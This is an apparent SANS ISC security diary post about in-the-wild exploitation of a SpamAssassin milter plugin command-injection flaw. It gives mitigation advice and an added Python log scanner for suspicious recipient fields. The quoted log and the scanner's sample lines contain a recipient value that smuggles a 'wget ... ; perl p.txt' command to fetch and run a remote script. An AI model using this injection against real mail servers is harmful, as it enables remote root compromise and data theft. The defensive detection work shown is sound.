
SANS ISC InfoSec Handlers Diary Blog


Spamassassin Milter Plugin Remote Root Attack

Published: 2010-03-15
Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
4 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://;perl p.txt:[] : User unknown in local recipient
       table; from=<> to=<root+:|wget
       hxxp:// : 1 Time(s)

Handler Bojan notes that the bad guys appear to have started actively exploiting the SpamAssassin milter vulnerability that was published last weekend (more details at

The perl script collects some information about the local host and tries to send it to on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code:

Alternatively, don't use the -x option when running this plugin, and do not run it as root.
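
To check your own mail logs for attempts like the one Roy caught, the following is an added example (not part of the original diary or of the plugin's code) that flags recipient fields carrying a pipe or other shell-style characters. It assumes Postfix-style `to=<...>` fields; the function name, token list and sample lines are constructed for illustration.

```python
import re

# Recipient field as written by Postfix-style logs: to=<...>. The closing '>'
# is optional so wrapped or truncated summary lines (as in the excerpt) still match.
TO_FIELD = re.compile(r"to=<([^>\n]*)>?")

# Pipe, semicolon, backtick, whitespace or "$(" inside a recipient. Some of these
# are legal in an RFC 5321 local part but are rare in real mail; tune per site.
SUSPICIOUS = re.compile(r"[|;`\s]|\$\(")


def suspicious_recipients(lines):
    """Return (line_no, recipient, sorted matched tokens) for each flagged recipient."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        for match in TO_FIELD.finditer(line):
            rcpt = match.group(1)
            tokens = sorted(set(SUSPICIOUS.findall(rcpt)))
            if tokens:
                hits.append((line_no, rcpt, tokens))
    return hits


# Constructed sample lines (not from Roy's server); hosts and addresses are placeholders.
SAMPLE_LOG = [
    "Mar 15 02:11:07 mx1 postfix/smtpd[4211]: NOQUEUE: reject: RCPT from "
    "unknown[192.0.2.10]: 550 5.1.1 <root+:|wget hxxp://host.invalid/p.txt;perl p.txt>: "
    "Recipient address rejected: User unknown in local recipient table; from=<> "
    "to=<root+:|wget hxxp://host.invalid/p.txt;perl p.txt> proto=SMTP helo=<mail>",
    "Mar 15 02:12:40 mx1 postfix/smtpd[4213]: NOQUEUE: reject: RCPT from "
    "unknown[198.51.100.7]: 550 5.1.1 <bob@example.org>: Recipient address rejected: "
    "User unknown in local recipient table; from=<alice@example.net> "
    "to=<bob@example.org> proto=ESMTP helo=<mx.example.net>",
    "Mar 15 02:13:02 mx1 postfix/qmgr[901]: 3F2A1C0: from=<alice@example.net>, "
    "size=1204, nrcpt=1 (queue active)",
    # Wrapped summary line, cut off after the command name as in the excerpt above.
    "       table; from=<> to=<root+:|wget",
]

if __name__ == "__main__":
    for line_no, rcpt, tokens in suspicious_recipients(SAMPLE_LOG):
        print(f"line {line_no}: recipient {rcpt!r} contains {tokens}")
```

A hit that ends in "User unknown", as in Roy's log, only shows the recipient was rejected by the MTA; whether the milter processed the address still depends on how the plugin is run.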

Adrien de Beaupré Inc.

